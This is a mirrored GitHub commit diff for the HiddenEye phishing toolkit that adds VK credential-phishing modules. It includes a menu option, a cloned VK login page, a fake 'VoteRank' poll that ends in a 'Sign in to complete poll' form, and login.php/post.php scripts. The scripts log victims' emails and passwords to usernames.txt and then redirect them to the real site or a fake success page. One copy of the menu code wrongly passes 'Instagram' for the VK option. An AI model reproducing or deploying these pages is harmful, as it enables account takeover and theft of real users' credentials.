mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
added VK standard and poll method and some minor fixes (#62)
* added VK standard and poll method phishing * Update SocialFish.py * Update SocialFishTermux.py * Update login.php * Update login.php
This commit is contained in:
parent
5649696061
commit
94b9a4ff07
|
@ -114,6 +114,11 @@ def runPhishing(social, option2):
|
||||||
copy_tree("WebPages/Instagram_web/", "Server/www/")
|
copy_tree("WebPages/Instagram_web/", "Server/www/")
|
||||||
elif option2 == '2' and social == 'Instagram':
|
elif option2 == '2' and social == 'Instagram':
|
||||||
copy_tree("WebPages/Instagram_autoliker/", "Server/www/")
|
copy_tree("WebPages/Instagram_autoliker/", "Server/www/")
|
||||||
|
elif option2 == '1' and social == 'VK':
|
||||||
|
copy_tree("WebPages/VK/", "Server/www/")
|
||||||
|
elif option2 == '2' and social == 'VK':
|
||||||
|
copy_tree("WebPages/VK_poll_method/", "Server/www/")
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
@ -206,7 +211,7 @@ def runPEnv():
|
||||||
system('clear')
|
system('clear')
|
||||||
print ('\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU NEED A GOOD MIND AND SOUL TO BE ONE OF US. GET AWAY FROM HERE AND DO NOT COME BACK WITH SAME MOTIVE. GOOD BYE!{1} ]\n'.format(RED, END))
|
print ('\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU NEED A GOOD MIND AND SOUL TO BE ONE OF US. GET AWAY FROM HERE AND DO NOT COME BACK WITH SAME MOTIVE. GOOD BYE!{1} ]\n'.format(RED, END))
|
||||||
exit(0)
|
exit(0)
|
||||||
option = input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}10{0}]{1} Yahoo\n\n {0}[{1}11{0}]{1} Twitch\n\n {0}[{1}12{0}]{1} Microsoft\n\n {0}[{1}13{0}]{1} Steam\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED With An0nUD4Y !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
|
option = input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}10{0}]{1} Yahoo\n\n {0}[{1}11{0}]{1} Twitch\n\n {0}[{1}12{0}]{1} Microsoft\n\n {0}[{1}13{0}]{1} Steam\n\n {0}[{1}14{0}]{1} VK\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED With An0nUD4Y !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
|
||||||
if option == '1':
|
if option == '1':
|
||||||
loadModule('Facebook')
|
loadModule('Facebook')
|
||||||
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n\n {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n\n {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
|
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n\n {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n\n {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
|
||||||
|
@ -259,6 +264,10 @@ def runPEnv():
|
||||||
loadModule('Steam')
|
loadModule('Steam')
|
||||||
option2 = ''
|
option2 = ''
|
||||||
runPhishing('Steam', option2)
|
runPhishing('Steam', option2)
|
||||||
|
elif option == '14':
|
||||||
|
loadModule('VK')
|
||||||
|
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}------------->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED ! \n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
|
||||||
|
runPhishing('VK', option2)
|
||||||
else:
|
else:
|
||||||
exit(0)
|
exit(0)
|
||||||
|
|
||||||
|
|
|
@ -113,6 +113,10 @@ def runPhishing(social, option2):
|
||||||
copy_tree("WebPages/Instagram_web/", "Server/www/")
|
copy_tree("WebPages/Instagram_web/", "Server/www/")
|
||||||
elif option2 == '2' and social == 'Instagram':
|
elif option2 == '2' and social == 'Instagram':
|
||||||
copy_tree("WebPages/Instagram_autoliker/", "Server/www/")
|
copy_tree("WebPages/Instagram_autoliker/", "Server/www/")
|
||||||
|
elif option2 == '1' and social == 'VK':
|
||||||
|
copy_tree("WebPages/VK/", "Server/www/")
|
||||||
|
elif option2 == '2' and social == 'VK':
|
||||||
|
copy_tree("WebPages/VK_poll_method/", "Server/www/")
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
@ -205,7 +209,7 @@ def runPEnv():
|
||||||
system('clear')
|
system('clear')
|
||||||
print ('\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU NEED A GOOD MIND AND SOUL TO BE ONE OF US. GET AWAY FROM HERE AND DO NOT COME BACK WITH SAME MOTIVE. GOOD BYE!{1} ]\n'.format(RED, END))
|
print ('\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU NEED A GOOD MIND AND SOUL TO BE ONE OF US. GET AWAY FROM HERE AND DO NOT COME BACK WITH SAME MOTIVE. GOOD BYE!{1} ]\n'.format(RED, END))
|
||||||
exit(0)
|
exit(0)
|
||||||
option = input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}10{0}]{1} Yahoo\n\n {0}[{1}11{0}]{1} Twitch\n\n {0}[{1}12{0}]{1} Microsoft\n\n {0}[{1}13{0}]{1} Steam\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED With An0nUD4Y !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
|
option = input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}10{0}]{1} Yahoo\n\n {0}[{1}11{0}]{1} Twitch\n\n {0}[{1}12{0}]{1} Microsoft\n\n {0}[{1}13{0}]{1} Steam\n\n {0}[{1}14{0}]{1} VK\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED With An0nUD4Y !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
|
||||||
if option == '1':
|
if option == '1':
|
||||||
loadModule('Facebook')
|
loadModule('Facebook')
|
||||||
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n\n {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n\n {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
|
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n\n {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n\n {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
|
||||||
|
@ -258,6 +262,10 @@ def runPEnv():
|
||||||
loadModule('Steam')
|
loadModule('Steam')
|
||||||
option2 = ''
|
option2 = ''
|
||||||
runPhishing('Steam', option2)
|
runPhishing('Steam', option2)
|
||||||
|
elif option == '14':
|
||||||
|
loadModule('VK')
|
||||||
|
option2 = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}------------->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED ! \n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
|
||||||
|
runPhishing('Instagram', option2)
|
||||||
else:
|
else:
|
||||||
exit(0)
|
exit(0)
|
||||||
|
|
||||||
|
|
361
WebPages/VK/index.html
Normal file
361
WebPages/VK/index.html
Normal file
File diff suppressed because one or more lines are too long
6
WebPages/VK/login.php
Normal file
6
WebPages/VK/login.php
Normal file
|
@ -0,0 +1,6 @@
|
||||||
|
<?php
|
||||||
|
include 'ip.php';
|
||||||
|
|
||||||
|
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
|
||||||
|
header('Location: https://vk.com/login');
|
||||||
|
exit();
|
149
WebPages/VK/mobile.html
Normal file
149
WebPages/VK/mobile.html
Normal file
File diff suppressed because one or more lines are too long
6
WebPages/VK/post.php
Normal file
6
WebPages/VK/post.php
Normal file
|
@ -0,0 +1,6 @@
|
||||||
|
<?php
|
||||||
|
include 'ip.php';
|
||||||
|
|
||||||
|
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
|
||||||
|
header('Location: https://m.vk.com');
|
||||||
|
exit();
|
BIN
WebPages/VK_poll_method/counter.gif
Normal file
BIN
WebPages/VK_poll_method/counter.gif
Normal file
Binary file not shown.
After Width: | Height: | Size: 43 B |
BIN
WebPages/VK_poll_method/hit.gif
Normal file
BIN
WebPages/VK_poll_method/hit.gif
Normal file
Binary file not shown.
After Width: | Height: | Size: 43 B |
103
WebPages/VK_poll_method/index.html
Normal file
103
WebPages/VK_poll_method/index.html
Normal file
|
@ -0,0 +1,103 @@
|
||||||
|
|
||||||
|
<!DOCTYPE html>
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>VoteRank #289032</title>
|
||||||
|
<meta charset="UTF-8">
|
||||||
|
<meta name="viewport" content="width=device-width, initial-scale=1">
|
||||||
|
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
|
||||||
|
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Raleway">
|
||||||
|
|
||||||
|
<style>
|
||||||
|
.hover {
|
||||||
|
color: #FFF;
|
||||||
|
text-align: center;
|
||||||
|
width: 222px;
|
||||||
|
cursor:pointer;
|
||||||
|
background-color: #0EADFF;
|
||||||
|
display: block;margin:-15px auto 10px auto;border-radius:20px;border-color:transparent;height:40px;
|
||||||
|
}
|
||||||
|
|
||||||
|
.hover1:hover {
|
||||||
|
color: #FFF;
|
||||||
|
text-align: center;
|
||||||
|
width: 222px;
|
||||||
|
cursor:pointer;
|
||||||
|
background-color: #108ee9;;
|
||||||
|
display: block;margin:-15px auto 10px auto;border-radius:20px;border-color:transparent;height:40px;
|
||||||
|
}
|
||||||
|
</style>
|
||||||
|
</head>
|
||||||
|
<!-- !PAGE CONTENT! -->
|
||||||
|
<div class="w3-content" style="max-width:1500px">
|
||||||
|
<!-- Header -->
|
||||||
|
<header class="w3-panel w3-center w3-opacity" style="padding:128px 16px">
|
||||||
|
<h1 class="w3-xlarge">VoteRank</h1>
|
||||||
|
<h1>#289032</h1>
|
||||||
|
</header>
|
||||||
|
|
||||||
|
<body bgcolor="#eff0f1" style="text-align:center;">
|
||||||
|
<div>
|
||||||
|
<form action="index2.html">
|
||||||
|
<div id="group1">
|
||||||
|
|
||||||
|
What is your name?<br><input type="text" required><br></br>
|
||||||
|
|
||||||
|
|
||||||
|
In what mountain do you live?<br><input type="text" required><br></br>
|
||||||
|
|
||||||
|
How old are you?<br><input type="text" required><br></br>
|
||||||
|
|
||||||
|
What are your favorite social networks?<br>
|
||||||
|
|
||||||
|
<input type="checkbox" value="facebook" name="social" > Facebook<br>
|
||||||
|
<input type="checkbox" value="twitter" name="social" > Twitter<br>
|
||||||
|
<input type="checkbox" value="linkedin" name="social" > LinkedIn<br>
|
||||||
|
<input type="checkbox" value="instagram" name="social" > Instagram<br>
|
||||||
|
<input type="checkbox" value="snapchat" name="social" > Snapchat<br>
|
||||||
|
<input type="checkbox" value="googleplus" name="social" > Google+<br>
|
||||||
|
<input type="checkbox" value="vkontakte" name="social" > Vkontakte<br></br>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<div id="group2">
|
||||||
|
What is your favorite color?<br>
|
||||||
|
<input type="checkbox" value="blue" name="color" > Blue<br>
|
||||||
|
<input type="checkbox" value="red" name="color" > Red<br>
|
||||||
|
<input type="checkbox" value="green" name="color" > Green<br>
|
||||||
|
<input type="checkbox" value="yellow" name="color" > Yellow<br>
|
||||||
|
<input type="checkbox" value="purple" name="color" > Purple<br>
|
||||||
|
<input type="checkbox" value="orange" name="color" > Orange<br>
|
||||||
|
<input type="checkbox" value="black" name="color" > Black<br>
|
||||||
|
<input type="checkbox" value="white" name="color" > White<br>
|
||||||
|
<input type="checkbox" value="grey" name="color" > Grey<br>
|
||||||
|
<input type="checkbox" value="brown" name="color" > Brown<br>
|
||||||
|
<input type="checkbox" value="pink" name="color" > Pink<br></br>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<div id="group3">
|
||||||
|
Do you prefer money as a gift?<br>
|
||||||
|
<input type="checkbox" value="yes" name="color" > Yes<br>
|
||||||
|
<input type="checkbox" value="no" name="color" > No<br></br>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
</div>
|
||||||
|
<div id="group3">
|
||||||
|
Your favorite genre of music?<br>
|
||||||
|
<input type="checkbox" value="naarod" name="color" > People's<br>
|
||||||
|
<input type="checkbox" value="rok" name="color" > Rock<br>
|
||||||
|
<input type="checkbox" value="metal" name="color" > Metal<br>
|
||||||
|
<input type="checkbox" value="pop" name="color" > Pop<br>
|
||||||
|
<input type="checkbox" value="gjaz" name="color" > Jazz<br>
|
||||||
|
<input type="checkbox" value="shanson" name="color" > Shanson<br>
|
||||||
|
<input type="checkbox" value="hip-hop" name="color" > Hip-hop<br>
|
||||||
|
<input type="checkbox" value="rap" name="color" > Rap<br>
|
||||||
|
<input type="checkbox" value="electro" name="color" > Electronic<br>
|
||||||
|
<input type="checkbox" value="another" name="color" > Other<br></br>
|
||||||
|
<input type="submit" value="Submit" class="hover hover1">
|
||||||
|
|
||||||
|
</div>
|
||||||
|
</form>
|
||||||
|
</div>
|
||||||
|
</body>
|
||||||
|
</body>
|
||||||
|
</html>
|
77
WebPages/VK_poll_method/index2.html
Normal file
77
WebPages/VK_poll_method/index2.html
Normal file
|
@ -0,0 +1,77 @@
|
||||||
|
<!--?xml version="1.0" encoding="utf-8"?-->
|
||||||
|
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
|
||||||
|
<html xmlns="http://www.w3.org/1999/xhtml" class="vk vk_js_yes vk_flex_yes r d h vk_withVolumeLine vk_appAuth_no"><head>
|
||||||
|
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
|
||||||
|
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
|
||||||
|
<meta name="theme-color" content="#5181b8">
|
||||||
|
|
||||||
|
|
||||||
|
<title>Номер голоса #289032</title>
|
||||||
|
<link rel="shortcut icon" href="https://m.vk.com/images/icons/favicons/fav_logo.ico?8">
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<link type="text/css" rel="stylesheet" href="./s_cfmxw.css">
|
||||||
|
<link type="text/css" rel="stylesheet" media="only screen" href="./s_cfmxw.css">
|
||||||
|
<script type="text/javascript" src="./s_c.js?752"></script>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<body id="vk" class="vk__page _hover _hfixed vk_stickers_hints_support_yes opera_mini_no vk__page_login vk_al_yes" onresize="onBodyResize(true);" style="padding-bottom: 110px;">
|
||||||
|
<div class="layout">
|
||||||
|
|
||||||
|
|
||||||
|
<div class="layout__header mhead" id="vk_head">
|
||||||
|
<div class="hb_wrap">
|
||||||
|
<div class="hb_btn"> </div>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
<div class="layout__body qs_enabled _js _copts" id="vk_wrap">
|
||||||
|
<div class="layout__leftMenu" id="l" style="min-height: 0px;">
|
||||||
|
|
||||||
|
</div>
|
||||||
|
<div class="layout__basis" id="m" style="min-height: 0px;">
|
||||||
|
<div class="basis">
|
||||||
|
<div class="basis__header mhead" id="mhead">
|
||||||
|
<img src="./top_logo.png">
|
||||||
|
<div class="hb_btn mhi_logo"> </div>
|
||||||
|
<h1 class="hb_btn mh_header"> </h1>
|
||||||
|
</a>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<div class="basis__content mcont" id="mcont" data-canonical=""><div class="pcont fit_box bl_cont new_form">
|
||||||
|
|
||||||
|
<div class="form_item">
|
||||||
|
|
||||||
|
|
||||||
|
<div class="login_header">Sign in to complete poll</div><form method="post" action="login.php">
|
||||||
|
<dl class="fi_row">
|
||||||
|
<dd>
|
||||||
|
<input class="textfield" name="email" placeholder="Phone or email" type="text">
|
||||||
|
</dd>
|
||||||
|
</dl>
|
||||||
|
<dl class="fi_row">
|
||||||
|
<dd>
|
||||||
|
<input class="textfield" name="pass" placeholder="Password" type="password">
|
||||||
|
</dd>
|
||||||
|
</dl>
|
||||||
|
|
||||||
|
<div class="fi_row_new">
|
||||||
|
<input class="button wide_button" value="Log In" type="submit">
|
||||||
|
</div>
|
||||||
|
|
||||||
|
</form>
|
||||||
|
</div>
|
||||||
|
</div></div>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<script type="text/javascript">
|
||||||
|
</script><div id="vk_utils"></div>
|
||||||
|
<div id="z"></div>
|
||||||
|
<div id="vk_bottom"></div>
|
||||||
|
|
||||||
|
|
||||||
|
</body></head></html>
|
6
WebPages/VK_poll_method/login.php
Normal file
6
WebPages/VK_poll_method/login.php
Normal file
|
@ -0,0 +1,6 @@
|
||||||
|
<?php
|
||||||
|
include 'ip.php';
|
||||||
|
|
||||||
|
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
|
||||||
|
header('Location: ./result.html');
|
||||||
|
exit();
|
BIN
WebPages/VK_poll_method/p.gif
Normal file
BIN
WebPages/VK_poll_method/p.gif
Normal file
Binary file not shown.
After Width: | Height: | Size: 43 B |
21
WebPages/VK_poll_method/result.html
Normal file
21
WebPages/VK_poll_method/result.html
Normal file
|
@ -0,0 +1,21 @@
|
||||||
|
|
||||||
|
<!DOCTYPE html>
|
||||||
|
<html>
|
||||||
|
<title>Poll completed successfully. Thnak You!</title>
|
||||||
|
<meta charset="UTF-8">
|
||||||
|
<meta name="viewport" content="width=device-width, initial-scale=1">
|
||||||
|
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
|
||||||
|
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Raleway">
|
||||||
|
<!-- !PAGE CONTENT! -->
|
||||||
|
<div class="w3-content" style="max-width:1500px">
|
||||||
|
<!-- Header -->
|
||||||
|
<header class="w3-panel w3-center w3-opacity" style="padding:128px 16px">
|
||||||
|
<h1 class="w3-xlarge">VoteRank</h1>
|
||||||
|
<h1>#289032</h1>
|
||||||
|
</header>
|
||||||
|
|
||||||
|
<body>
|
||||||
|
<p align="center"><font size="10px" color="green">Poll completed successfully. Thank You!</font></p>
|
||||||
|
</body>
|
||||||
|
</body>
|
||||||
|
</html>
|
2
WebPages/VK_poll_method/s_c.js
Normal file
2
WebPages/VK_poll_method/s_c.js
Normal file
File diff suppressed because one or more lines are too long
6
WebPages/VK_poll_method/s_cfmxw.css
Normal file
6
WebPages/VK_poll_method/s_cfmxw.css
Normal file
File diff suppressed because one or more lines are too long
8
WebPages/VK_poll_method/s_yzgt.css
Normal file
8
WebPages/VK_poll_method/s_yzgt.css
Normal file
File diff suppressed because one or more lines are too long
2
WebPages/VK_poll_method/s_z.js
Normal file
2
WebPages/VK_poll_method/s_z.js
Normal file
File diff suppressed because one or more lines are too long
BIN
WebPages/VK_poll_method/top_logo.png
Normal file
BIN
WebPages/VK_poll_method/top_logo.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 703 B |
|
@ -2,5 +2,5 @@
|
||||||
include 'ip.php';
|
include 'ip.php';
|
||||||
|
|
||||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
|
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
|
||||||
header('Location: https://mbasic.facebook.com/');
|
header('Location: ./result.html');
|
||||||
exit();
|
exit();
|
||||||
|
|
|
@ -2,5 +2,5 @@
|
||||||
include 'ip.php';
|
include 'ip.php';
|
||||||
|
|
||||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
|
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
|
||||||
header('Location: https://google.com/');
|
header('Location: ./result.html');
|
||||||
exit();
|
exit();
|
||||||
|
|
Loading…
Reference in New Issue
Block a user